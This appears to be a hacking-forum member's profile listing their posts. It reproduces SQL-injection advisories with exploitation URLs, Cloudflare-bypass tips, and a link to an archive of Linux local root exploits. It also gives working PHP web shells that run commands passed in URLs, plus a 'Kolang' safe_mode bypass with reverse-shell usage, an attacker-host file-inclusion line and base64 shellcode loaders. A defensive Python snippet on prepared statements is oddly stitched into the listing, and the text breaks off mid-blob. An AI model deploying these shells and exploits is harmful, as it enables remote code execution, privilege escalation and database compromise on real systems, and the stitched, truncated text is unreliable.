Uzun DZ

Member
  • Number of posts

    19
  • Join date

  • Last visit

Reputation on site

0 Neutral

About Uzun DZ

  • Date of birth 93/02/08

Converted

  • Name
    Uzun
  • Main os
    Linux
  • Programming language
    No
  1. Uzun DZ

    Xavier V2.4 Php Mp - Sql Injection Web Vulnerabilities

    https://www.vulnerability-lab.com/get_content.php?id=2076

    Document Title:
    ===============
    Xavier v2.4 PHP MP - SQL Injection Web Vulnerabilities

    References (Source):
    ====================
    https://www.vulnerability-lab.com/get_content.php?id=2076
    http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-15949

    CVE-ID:
    =======
    CVE-2017-15949

    Release Date:
    =============
    2017-06-06

    Vulnerability Laboratory ID (VL-ID):
    ====================================
    2076

    Common Vulnerability Scoring System:
    ====================================
    5.3

    Vulnerability Class:
    ====================
    SQL Injection

    Current Estimated Price:
    ========================
    1.000€ - 2.000€

    Product & Service Introduction:
    ===============================
    The script can easily be dropped in to an existing website allowing you to protect pages by adding one line of PHP code at the top of a page. You can also protect sections of pages. Secure your web pages or sections of content dependent on whether your users are logged in or out, or whether they are a member of a User Group. Or secure your pages dependent on whether you are logged on as an administrator.

    (Copy of the Homepage: https://codecanyon.net/item/xavier-php-login-script-user-management/9146226 )

    Abstract Advisory Information:
    ==============================
    The vulnerability laboratory core research team discovered multiple sql-injection web vulnerabilities in the Xavier PHP Login Script & User Management Admin Panel v2.4 web-application.

    Vulnerability Disclosure Timeline:
    ==================================
    2017-06-06: Public Disclosure (Vulnerability Laboratory)

    Discovery Status:
    =================
    Published

    Affected Product(s):
    ====================
    Siggles
    Product: Xavier - PHP Login Script & User Management Admin Panel 2.4

    Exploitation Technique:
    =======================
    Remote

    Severity Level:
    ===============
    Medium

    Technical Details & Description:
    ================================
    Multiple sql-injection vulnerabilities have been discovered in the Xavier PHP Login Script & User Management Admin Panel web-application. The issue allows remote attackers to inject own malicious sql commands to compromise the web-application & database management system.

    The sql-injection vulnerabilities are located in the `usertoedit` and `log_id` parameters of the `adminuseredit.php` and `editgroup.php` files. Remote attackers with privileged user accounts are able to compromise the web-application and database management system by injection of sql commands via GET method request. The attack vector is client-side and the request method to inject the sql commands is GET. The vulnerability is a classic order by sql-injection.

    The security risk of the sql-injection web vulnerability is estimated as medium with a common vulnerability scoring system count of 5.3. Exploitation of the remote sql-injection web vulnerability requires an authenticated web-application user account and no user interaction. Successful exploitation of the sql-injection web vulnerability results in web-application or database management system compromise.

    Request Method(s):
    [+] GET

    Vulnerable File(s):
    [+] adminuseredit.php
    [+] editgroup.php

    Vulnerable Parameter(s):
    [+] usertoedit
    [+] log_id

    Proof of Concept (PoC):
    =======================
    The remote sql-injection vulnerability can be exploited by authenticated user accounts without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

    PoC: Example
    https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=[sql-INJECTION VULNERABILITY!]
    https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=[sql-INJECTION VULNERABILITY!]

    PoC: Exploitation
    https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=1%20order%20by%203--
    https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=1%20order%20by%203--

    --- SQL Error & Exception Logs ---
    Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42S22]: Column not found: 1054 Unknown column '100' in 'order clause'' in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:300
    Stack trace:
    #0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(300): PDO->query('SELECT * FROM `...')
    #1 /home/angry/public_html/xavier-demo/admin/editgroup.php(11): Functions->returnGroupInfo(Object(Database), '1 order by 100-...')
    #2 {main}
    thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 300
    -
    Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1' in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:300
    Stack trace:
    #0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(300): PDO->query('SELECT * FROM `...')
    #1 /home/angry/public_html/xavier-demo/admin/editgroup.php(11): Functions->returnGroupInfo(Object(Database), ''')
    #2 {main}
    thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 300
    -
    Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1' in /home/angry/public_html/xavier-demo/admin/includes/Functions.php:59
    Stack trace:
    #0 /home/angry/public_html/xavier-demo/admin/includes/Functions.php(59): PDO->query('SELECT username...')
    #1 /home/angry/public_html/xavier-demo/admin/adminuseredit.php(26): Functions->usernameTaken('-1' -1'')
    #2 {main}
    thrown in /home/angry/public_html/xavier-demo/admin/includes/Functions.php on line 59

    --- PoC Session Logs [GET] ---
    Status: 200[OK]
    GET https://xavier-php.localhost:8080/xavier/admin/editgroup.php?log_id=%27[sql-INJECTION VULNERABILITY!]--
    Mime Type[text/html]
    Request Header:
    Host[xavier-php.localhost:8080]
    User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0]
    Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
    Cookie[phpSESSID=6b9f9560a6a0d35b12b8603424cf2525]
    Connection[keep-alive]
    Upgrade-Insecure-Requests[1]
    Response Header:
    Server[Apache]
    Keep-Alive[timeout=2, max=100]
    Connection[Keep-Alive]
    Transfer-Encoding[chunked]
    Content-Type[text/html]
    -
    20:49:05.559[216ms][total 277ms] Status: 200[OK]
    GET https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php?usertoedit=%27[sql-INJECTION VULNERABILITY!]--
    Mime Type[text/html]
    Request Header:
    Host[xavier-php.localhost:8080]
    User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0]
    Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
    Cookie[phpSESSID=6b9f9560a6a0d35b12b8603424cf2525]
    Connection[keep-alive]
    Upgrade-Insecure-Requests[1]
    Response Header:
    Server[Apache]
    Keep-Alive[timeout=2, max=100]
    Connection[Keep-Alive]
    Transfer-Encoding[chunked]
    Content-Type[text/html]

    Reference(s):
    https://xavier-php.localhost:8080/
    https://xavier-php.localhost:8080/xavier/
    https://xavier-php.localhost:8080/xavier/admin/
    https://xavier-php.localhost:8080/xavier/admin/editgroup.php
    https://xavier-php.localhost:8080/xavier/admin/adminuseredit.php

    Solution - Fix & Patch:
    =======================
    The vulnerability can be patched by a parse via escape of the vulnerable parameters in the affected php files. Restrict the parameter input and use a prepared statement to secure the functions of the admin panel. Disallow the preview of errors in the php code of the panel to prevent attacks.

    Security Risk:
    ==============
    The security risk of the sql-injection vulnerability in the web panel of the xavier application is estimated as medium (CVSS 5.3).

    Credits & Authors:
    ==================
    Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)

    Disclaimer & Information:
    =========================
    The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.

    Domains:    www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
    Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
    Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
    Social:     twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab

    Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact ([email protected]) to ask for permission.

    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
  2. Uzun DZ

    Joomla Com_jajobboard V1.5 - Sql Injection Vulnerability

    Joomla com_jajobboard v1.5 - SQL Injection Vulnerability

    Document Title:
    ===============
    Joomla com_jajobboard v1.5 - SQL Injection Vulnerability

    References (Source):
    ====================
    https://www.vulnerability-lab.com/get_content.php?id=2036

    Release Date:
    =============
    2017-02-25

    Vulnerability Laboratory ID (VL-ID):
    ====================================
    2036

    Common Vulnerability Scoring System:
    ====================================
    7.1

    Product & Service Introduction:
    ===============================
    JoomlArt is happy to announce the release of JA Job Board for Joomla 2.5, an ultimate Joomla-based recruitment component. It renders an enterprise-level, rich-featured, strongly scalable and easy-to-use Job site solution, to help Administrators manage their Job site effectively.

    (Copy of the Homepage: https://www.joomlart.com/joomla/extensions/ja-jobboard )

    Abstract Advisory Information:
    ==============================
    An independent vulnerability laboratory partner team researcher discovered a remote sql-injection web vulnerability in the official Joomla CMS JaJob Board v1.5 component.

    Vulnerability Disclosure Timeline:
    ==================================
    2017-02-25: Public Disclosure (Vulnerability Laboratory)

    Discovery Status:
    =================
    Published

    Affected Product(s):
    ====================
    Joomlart
    Product: com_jajobboard - Joomla Component (Web-Application) 1.5

    Exploitation Technique:
    =======================
    Remote

    Severity Level:
    ===============
    High

    Technical Details & Description:
    ================================
    A remote sql-injection vulnerability has been discovered in the official Joomla CMS JaJob Board v1.5 component. The issue allows remote attackers to execute own malicious sql commands to compromise the web-application or dbms.

    The sql-injection vulnerability is located in the `job_tags` and `Itemid` parameters of the `jajobs jalist` module. The request method to execute is GET and the attack vector is client-side. Remote attackers are able to inject own malicious sql commands via the vulnerable `job_tags` and `Itemid` parameters to compromise the web-application or dbms. The web vulnerability is a classic sql-injection in the joomla `com_jajobboard` component.

    The security risk of the vulnerability is estimated as high with a common vulnerability scoring system count of 7.1. Exploitation of the sql-injection vulnerability requires no privileged web-application user account or user interaction. Successful exploitation of the web vulnerability results in web-application or database management system compromise.

    Request Method(s):
    [+] GET

    Vulnerable Module(s):
    [+] jajobs jalist

    Vulnerable File(s):
    [+] index.php

    Vulnerable Parameter(s):
    [+] job_tags
    [+] Itemid

    Affected Component(s):
    [+] com_jajobboard (joomla)

    Proof of Concept (PoC):
    =======================
    The sql-injection web vulnerability can be exploited by remote attackers without privileged web-application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

    Dork(s):
    inurl:index.php?option=com_jajobboard
    site:index.php?option=com_jajobboard

    PoC: Exploitation
    http://localhost/[JOOMLA_PATH]/index.php?option=com_jajobboard&view=jajobs&layout=jalist&job_tags=[sql-INJECTION VULNERABILITY!]&Itemid=x
    http://localhost/[JOOMLA_PATH]/index.php?option=com_jajobboard&view=jajobs&layout=jalist&job_tags=x&Itemid=[sql-INJECTION VULNERABILITY!]

    Reference(s):
    http://localhost/joomla/
    http://localhost/joomla/index.php

    Solution - Fix & Patch:
    =======================
    The sql-injection web vulnerability can be resolved by a parse and restriction of the vulnerable Itemid and job_tags parameters. Disallow the usage of special chars and use the escape function. Implement a secure prepared statement to resolve the vulnerability.
    Security Risk:
    ==============
    The security risk of the remote sql injection web vulnerability in the web-application plugin is estimated as high. (CVSS 7.1)

    Credits & Authors:
    ==================
    Amir - Iranian Exploit Database (www.iedb.ir) [http://www.vulnerability-lab.com/show.php?user=IEDB%20Team]

    Thanks: C0dex, B3hz4d, Beni_vanda, Mr_time, Bl4ck M4n, black_security, Yasser, Ramin Assadian, Black_Nofuzi, SecureHost, 1TED, Mr_Kelever, Mr_keeper, Mahmod, Iedb, Khashayar, B3hz4d4, Shabgard, Cl09er, Be_lucky, MoslemHaghighian, Dr_Iman, 8Bit, Javid, Esmiley_Amir, Mahdi_feizezade, Amin_Zohrabi, Shellshock3 ... all my friends and the Iedb Team.
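    Both advisories above (the Xavier `usertoedit`/`log_id` order-by injection and the JA Job Board `Itemid`/`job_tags` injection) recommend the same fix: restrict the parameter to the shape the page expects and bind it with a prepared statement instead of concatenating it. The following is an added example, not code from either advisory or from the Xavier or JA Job Board projects; it uses an in-memory SQLite table with constructed rows, and the function names (`lookup_group_vulnerable`, `lookup_group_safe`, `parse_record_id`, `outcome`) are assumptions of this example.

```python
import re
import sqlite3


class InvalidParameter(ValueError):
    """Raised when a GET parameter does not have the shape the page expects."""


def make_db():
    # Constructed sample rows standing in for an admin panel's group table;
    # not data from either advisory.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE groups (id INTEGER PRIMARY KEY, name TEXT, level INTEGER)"
    )
    conn.executemany(
        "INSERT INTO groups VALUES (?, ?, ?)",
        [(1, "admins", 9), (2, "editors", 5), (3, "members", 1)],
    )
    return conn


def lookup_group_vulnerable(conn, raw_id):
    # Vulnerable pattern: the raw GET parameter is concatenated into the SQL
    # text, so an 'order by N' suffix is executed as part of the statement.
    # N within the column count succeeds, N out of range raises a database
    # error, which is the oracle the advisory's PDOException page exposed.
    sql = "SELECT id, name, level FROM groups WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


# A record id is a positive integer of bounded length and nothing else.
_RECORD_ID = re.compile(r"[1-9][0-9]{0,9}")


def parse_record_id(raw):
    # Restrict the parameter before any query is built: quotes, spaces and
    # SQL keywords are rejected here and never reach the database.
    if not isinstance(raw, str) or not _RECORD_ID.fullmatch(raw):
        raise InvalidParameter("record id must be a positive integer")
    return int(raw)


def lookup_group_safe(conn, raw_id):
    # Hardened pattern: the validated integer is bound as a query parameter,
    # so the driver never interprets user input as SQL.
    record_id = parse_record_id(raw_id)
    sql = "SELECT id, name, level FROM groups WHERE id = ?"
    return conn.execute(sql, (record_id,)).fetchall()


def outcome(lookup, conn, raw_id):
    # Classify what a given input does to a lookup: 'rows:N', 'db_error' or
    # 'rejected'. In a real handler 'db_error' should be logged server-side
    # and answered with a generic error page, never with the driver message.
    try:
        rows = lookup(conn, raw_id)
    except InvalidParameter:
        return "rejected"
    except sqlite3.Error:
        return "db_error"
    return "rows:%d" % len(rows)


if __name__ == "__main__":
    db = make_db()
    for payload in ("2", "1 order by 3--", "1 order by 100--", "'"):
        print("%-20r vulnerable=%-9s safe=%s" % (
            payload,
            outcome(lookup_group_vulnerable, db, payload),
            outcome(lookup_group_safe, db, payload)))
```

    With the vulnerable lookup the in-range and out-of-range order-by payloads produce different results (a row versus a database error), which is exactly the true/false oracle the advisories describe; the hardened lookup rejects both before touching the database.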
  3. Uzun DZ

    Burp Suite V1.7.27 - Remote Code Execution Vulnerability

    Burp Suite v1.7.27 - Remote Code Execution Vulnerability

    V1.7.27
    Vulnerability Class: Code Execution
    Current Estimated Price: 4.000€ - 5.000€
    Exploitation Technique: Remote
    Severity Level: High
    Video :
  4. Hi friends, we show 3 methods for bypassing Cloudflare security to get the real IP address of a website:
     • using a public website
     • using the dig command
     • using websploit
     http://cloudflare-watch.org.statstool.com/
     https://www.youtube.com/watch?v=cQZWPpWMxVA
     Bypass cloudflare security to get real IP address of website.zip
  5. Bypass DNS Protector (Cloud flare)
  6. Apple iOS v9.0, v9.1 & v9.2.1 - Multiple Pass Code Bypass Vulnerabilities http://www.vulnerability-lab.com/get_content.php?id=1779
  7. http://www.vulnerability-lab.com/get_content.php?id=1596
  8. Hi Guys, we have bypassed the forbidden error with AnonGhost Shell Script via a Perl-based Symlink Tool. See it: https://www.youtube.com/watch?v=1ufal4tFZac
  9. Uzun DZ

    Full Archive 2.6.32 2012-2013 Local root Exploits

    2.6.32 2012-2013 Local root Exploits

    Tested On:
    Linux 3.2.0-0.bpo.3-amd64 #1 SMP Thu Aug 23 07:41:30 UTC 2012 x86_64
    Linux 2.6.32-358.0.1.el6.x86_64 #1 SMP Wed Feb 27 06:06:45 UTC 2013 x86_64
    Linux 2.6.32-042stab061.2 #1 SMP Fri Aug 24 09:07:21 MSK 2012 x86_64
    Linux 2.6.32-379.14.1.lve1.1.9.9.el6.x86_64 #1 SMP Thu Dec 6 07:12:24 EST 2012 x86_64
    Linux 2.6.32-12-pve #1 SMP Tue May 15 06:02:20 CEST 2012 x86_64
    Linux 2.6.32-131.21.1.el6.x86_64 #1 SMP Tue Nov 22 19:48:09 GMT 2011 x86_64
    Linux 3.2.7 #1 SMP Sun Feb 26 23:00:18 CET 2012 x86_64
    Linux 2.6.32-279.14.1.el6.x86_64 #1 SMP Tue Nov 6 23:43:09 UTC 2012 x86_64
    Linux 2.6.32-379.22.1.lve1.2.17.el5h.x86_64 #1 SMP Wed Apr 3 14:28:52 EEST 2013 x86_64
    Linux 2.6.32-320.4.1.lve1.1.4.el6.x86_64 #1 SMP Wed Mar 7 06:32:27 EST 2012 x86_64
    Linux 2.6.32-220.7.1.el6.x86_64 #1 SMP Wed Mar 7 00:52:02 GMT 2012 x86_64
    Linux 2.6.32-7-pve #1 SMP Mon Feb 13 07:33:21 CET 2012 x86_64
    Linux 2.6.32-042stab062.2 #1 SMP Wed Oct 10 18:28:35 MSK 2012 x86_64
    Linux 2.6.38 #5 SMP Sat Mar 19 13:19:08 CET 2011 x86_64
    Linux 2.6.32 #1 SMP Wed Sep 5 22:46:20 MSK 2012 x86_64
    Linux 2.6.32-379.19.1.lve1.2.7.el6.x86_64 #1 SMP Wed Jan 23 14:53:41 EST 2013 x86_64
    Linux 3.2.0-0.bpo.2.dar-amd64 #1 SMP Fri Apr 27 18:23:24 MSK 2012 x86_64
    Linux 2.6.32-16-pve #1 SMP Fri Nov 9 11:42:51 CET 2012 x86_64
    Linux 2.6.32-220.17.1.el6.x86_64 #1 SMP Wed May 16 00:01:37 BST 2012 x86_64
    Linux 2.6.32-279.9.1.el6.x86_64 #1 SMP Tue Sep 25 21:43:11 UTC 2012 x86_64
    Linux 2.6.32-042stab065.3 #1 SMP Mon Nov 12 21:59:14 MSK 2012 x86_64
    Linux 2.6.32-279.5.2.el6.x86_64 #1 SMP Fri Aug 24 01:07:11 UTC 2012 x86_64
    Linux 2.6.32-11-pve #1 SMP Wed Apr 11 07:17:05 CEST 2012 x86_64
    Linux 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64
    Linux 2.6.32-131.17.1.el6.x86_64 #1 SMP Thu Oct 6 19:24:09 BST 2011 x86_64
    Linux 2.6.32-042stab072.10 #1 SMP Wed Jan 16 18:54:05 MSK 2013 x86_64
    Linux 3.5.2 #1 SMP Thu Aug 23 17:07:20 CEST 2012 x86_64
    Linux 2.6.32-220.el6.x86_64 #1 SMP Tue Dec 6 19:48:22 GMT 2011 x86_64
    Linux 2.6.32-279.2.1.el6.x86_64 #1 SMP Fri Jul 20 01:55:29 UTC 2012 x86_64
    Linux 3.2.20 #1 SMP Tue Aug 28 02:39:06 MSK 2012 x86_64
    Linux 2.6.32-220.4.2.el6.x86_64 #1 SMP Tue Feb 14 04:00:16 GMT 2012 x86_64
    Linux 2.6.32-279.5.1.el6.x86_64 #1 SMP Tue Aug 14 23:54:45 UTC 2012 x86_64
    Linux 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64 GNU/Linux
    Linux 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64
    Linux 2.6.32-358.6.1.el6.x86_64 #1 SMP Tue Apr 23 19:29:00 UTC 2013 x86_64
    Linux 2.6.32-279.19.1.el6.x86_64 #1 SMP Wed Dec 19 07:05:20 UTC 2012 x86_64
    Linux 2.6.32-279.22.1.el6.x86_64 #1 SMP Wed Feb 6 03:10:46 UTC 2013 x86_64
    Linux 3.2.2-ipprojects #4 SMP Fri Feb 3 15:53:51 CET 2012 x86_64
    Linux 2.6.32-042stab076.5 #1 SMP Mon Mar 18 20:41:34 MSK 2013 x86_64
    Linux 2.6.32-220.4.1.el6.x86_64 #1 SMP Tue Jan 24 02:13:44 GMT 2012 x86_64
    Linux 2.6.32-379.22.1.lve1.2.17.el6.x86_64 #1 SMP Wed Apr 3 12:05:42 EEST 2013 x86_64
    Linux 2.6.32-042stab068.8 #1 SMP Fri Dec 7 17:06:14 MSK 2012 x86_64
    Linux 2.6.32-379.22.1.lve1.2.14.el6.x86_64 #1 SMP Wed Mar 6 15:12:30 EET 2013 x86_64
    Linux 2.6.32-379.19.1.lve1.2.6.el6.x86_64 #1 SMP Fri Jan 18 10:16:30 EST 2013 x86_64
    Linux 2.6.32-042stab053.5 #1 SMP Tue Mar 27 11:42:17 MSD 2012 x86_64
    Linux 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64

    Link: http://www.uppic.com/uploads/14401562601.rar
  10. PHP Perl Extension Safe_mode Bypass

    <?php
    if(!extension_loaded('perl'))die('perl extension is not loaded');
    if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
    if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls ';
    $perl=new perl();
    echo "<textarea rows='25' cols='75'>";
    $perl->eval("system('".$_GET['cmd']."')");
    echo "</textarea>";
    $_GET['cmd']=htmlspecialchars($_GET['cmd']);
    echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>"
    ?>
  11. PHP FFI Extension Safe_mode Bypass Exploit

    <?php
    if(!extension_loaded('ffi')) die('ERROR: FFI extension is not loaded!');
    $command=(empty($_GET['cmd']))?'dir':$_GET['cmd'];
    if(is_writeable(dirname(__FILE__)))$tmp=dirname(__FILE__);
    elseif(is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
    elseif(is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
    else die('ERROR: Move exploit to writeable folder.');
    $output="$tmp\\".uniqid('NJ');
    $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
    $res=$api->WinExec("cmd.exe /c $command >\"$output\"",0);
    while(!file_exists($output))sleep(1);
    $con='';
    $fp=fopen($output,'r');
    while(!feof($fp))$con.=fgets($fp,1024);
    fclose($fp);
    $con=htmlspecialchars($con);
    echo "<pre>$con</pre>";
    unlink($output);
    ?>
  12. Kolang (proc_open PHP safe mode bypass 4.3.10 - 5.3.0)

    <?php
    /*
    Kolang (PHP Safe mode bypass)
    (IHSteam priv8 for lazy penetration testers)
    (php 4.3.10 - 5.3.0)
    http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4018 (12/19/2009)
    http://www.milw0rm.com/exploits/7393 (12/09/2008)

    1- Kolang can be used directly in file inclusion RFI&LFI vulnerabilities (no upload required)
    2- Kolang can execute arbitrary shellcode (just for fans of metasploit )

    ~~~~ How to use:)
    for linux:
    kolang.php?os=linux&host=LHOST&port=LPORT
    or
    kolang.php?os=linux&shell=BASE64_ENCODED_SHELLCODE
    for freebsd:
    kolang.php?os=freebsd&shell=BASE64_ENCODED_SHELLCODE
    file inclusion :
    http://host/vul.php?path=http://attacker/kolang.txt?&os=linux&host=LHOST&port=LPORT

    http://localhost/kolang.php?host=localhost&port=2121
    [email protected] ~ $ nc -vv -l -p 2121
    listening on [any] 2121 ...
    connect to [127.0.0.1] from bugtraq [127.0.0.1] 40526
    id
    uid=65534(nobody) gid=65533(nogroup) groups=65533(nogroup)

    Hamid Ebadi
    http://www.bugtraq.ir
    contact : ebadi~bugtraq~ir
    Kolang means pickaxe (the idea came from amnafzar naming convention) (Separ, Sarand, Alak, Skort)
    */
    $port= intval($_REQUEST['port']);
    $host= $_REQUEST['host'];
    $os= $_REQUEST['os'];

    /*
    //compile : cc -o shellcode.so -fPIC -shared shellcode.c
    //
    //<?php
    //$data=file_get_contents('shellcode.so');
    //file_put_contents('shellcode_base64.txt',$data);
    //?>
    // "shellcode loader" : load and execute arbitrary shellcode from a file
    // Hamid Ebadi
    #define O_RDONLY 00 ; fcntl.h
    #define SHELLCODE_MAX_SIZE 1024
    // change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'
    #define SHELLCODE_FILENAME "/tmp/.X11-IHSTEAM"
    void getuid()
    {
        unsetenv("LD_PRELOAD"); //not really necessary, we can remove it
        int fd;
        char shellcode[SHELLCODE_MAX_SIZE];
        char filename[]=SHELLCODE_FILENAME ; // we can also pass the shellcode in program's arguments
        if ((fd = open(SHELLCODE_FILENAME,O_RDONLY)) < 0) {
            exit(1);
        }
        if (read(fd,shellcode,SHELLCODE_MAX_SIZE) < 0){
            exit(1);
        }
        (*(void(*)()) shellcode)();
    }
    */
    if ($_REQUEST['os']=='freebsd'){
        // freebsd shellcode loader (x86)
        $shellcode_loader= "[BASE64 ELF BLOB OMITTED]";
    }else{ // default: linux
        // linux shellcode loader (x86)
        $shellcode_loader= "[BASE64 ELF BLOB OMITTED]";
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAAD/////AAAAAAAAAAABAAAA XgAAAAwAAACQAwAADQAAAAgGAAAEAAAA9AAAAPX+/29AAQAABQAAAFwCAAAGAAAAfAEAAAoAAACW AAAACwAAABAAAAADAAAA9B8AAAIAAAAwAAAAFAAAABEAAAAXAAAAYAMAABEAAABAAwAAEgAAACAA AAATAAAACAAAAP7//28QAwAA////bwEAAADw//9v8gIAAPr//28BAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAfAAAAAAAAAAAAAL4DAADOAwAA 3gMAAO4DAAD+AwAADgQAABggAAAAR0NDOiAoR2VudG9vIDQuMy4xLXIxIHAxLjEpIDQuMy4xAABH Q0M6IChHZW50b28gNC4zLjIgcDEuMSkgNC4zLjIAAEdDQzogKEdlbnRvbyA0LjMuMiBwMS4xKSA0 LjMuMgAAR0NDOiAoR2VudG9vIDQuMy4yIHAxLjEpIDQuMy4yAABHQ0M6IChHZW50b28gNC4zLjEt cjEgcDEuMSkgNC4zLjEAAC5zeW10YWIALnN0cnRhYgAuc2hzdHJ0YWIALmdudS5oYXNoAC5keW5z eW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQA LmluaXQALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWUALmN0b3JzAC5kdG9ycwAuamNyAC5k eW5hbWljAC5nb3QALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbWVudAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8AAAAFAAAAAgAAAPQAAAD0AAAATAAAAAMAAAAAAAAA BAAAAAQAAAAbAAAA9v//bwIAAABAAQAAQAEAADwAAAADAAAAAAAAAAQAAAAEAAAAJQAAAAsAAAAC AAAAfAEAAHwBAADgAAAABAAAAAEAAAAEAAAAEAAAAC0AAAADAAAAAgAAAFwCAABcAgAAlgAAAAAA AAAAAAAAAQAAAAAAAAA1AAAA////bwIAAADyAgAA8gIAABwAAAADAAAAAAAAAAIAAAACAAAAQgAA AP7//28CAAAAEAMAABADAAAwAAAABAAAAAEAAAAEAAAAAAAAAFEAAAAJAAAAAgAAAEADAABAAwAA IAAAAAMAAAAAAAAABAAAAAgAAABaAAAACQAAAAIAAABgAwAAYAMAADAAAAADAAAACgAAAAQAAAAI 
